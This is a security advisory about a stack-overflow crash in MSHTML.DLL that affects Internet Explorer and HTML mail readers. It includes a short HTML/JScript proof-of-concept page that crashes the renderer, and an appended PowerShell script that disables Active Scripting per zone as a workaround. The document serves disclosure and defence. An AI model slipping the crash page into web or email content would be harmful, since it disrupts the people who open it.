Stack Overflow in MSHTML.DLL

Systems affected: Any program using MSHTML.DLL for HTML parsing (Internet Explorer, Outlook/Outlook Express and other HTML-enabled email readers). Reliably tested on IE 4.0 and higher on any Windows system, with any service packs and patches. Older versions of MSHTML.DLL may be affected too, but remain untested.

Risk: Low/Medium

Description: MSHTML.DLL crashes with a stack overflow from simple scripting.

Details: The bug is only experienced when dealing with multiple window objects, where one is receiving data. To reproduce the bug, create a JScript object, set a property on the object from the window object receiving data, delete the object and create it again. No exploitable buffer overflows have been found so far.

Code:

------------InstantCrash.html-----------------
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {};             // Object literal
test.document.open();     // Stream data into the iframe's document
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {};             // Crash
</script>
----------------------------------------------

Workaround: Disable Active Scripting.

Vendor status: Microsoft was contacted on 4 December 2000. The bug is considered a code quality bug and will be addressed in a future SP for IE.

--
Thor Larholm
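The workaround above is a one-liner; the following script, added here as an example and not part of the advisory, audits and applies it through the per-zone "Active scripting" setting (registry value 1400 under the Internet Settings Zones key) that IE and other MSHTML hosts honour. The zone key path, the value name and the 0/1/3 state codes are documented IE settings; everything else (function names, default zone selection) is this example's own choice.

```powershell
# Audit and apply the advisory's workaround ("Disable Active Scripting")
# via IE's per-zone registry settings. Value 1400 = Active scripting,
# states: 0 = Enable, 1 = Prompt, 3 = Disable. Current-user hive shown;
# the machine-wide policy uses the same layout under HKLM.
$zoneBase   = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
$zoneNames  = @{ 0 = 'My Computer'; 1 = 'Local intranet'; 2 = 'Trusted sites';
                 3 = 'Internet';    4 = 'Restricted sites' }
$stateNames = @{ 0 = 'Enable'; 1 = 'Prompt'; 3 = 'Disable' }

function Get-ActiveScriptingState {
    # One object per zone with the current Active scripting setting.
    foreach ($id in 0..4) {
        $key = Join-Path $zoneBase $id
        $val = (Get-ItemProperty -Path $key -Name '1400' -ErrorAction SilentlyContinue).'1400'
        $state = if ($null -eq $val) { 'not set (zone default)' }
                 elseif ($stateNames.ContainsKey([int]$val)) { $stateNames[[int]$val] }
                 else { "unknown ($val)" }
        [pscustomobject]@{ Zone = $id; Name = $zoneNames[$id]; ActiveScripting = $state }
    }
}

function Disable-ActiveScripting {
    # Default to the Internet and Restricted sites zones, where untrusted
    # HTML (web pages, HTML mail) is normally rendered.
    param([int[]]$Zones = @(3, 4))
    foreach ($id in $Zones) {
        $key = Join-Path $zoneBase $id
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name '1400' -Value 3 -Type DWord   # 3 = Disable
    }
}

Write-Host 'Before:'; Get-ActiveScriptingState | Format-Table -AutoSize
Disable-ActiveScripting
Write-Host 'After:';  Get-ActiveScriptingState | Format-Table -AutoSize
```

A zone with no 1400 value inherits its template default, which is why the audit reports "not set" rather than assuming Enable; run the script again after a vendor fix is installed if scripting is to be re-enabled deliberately.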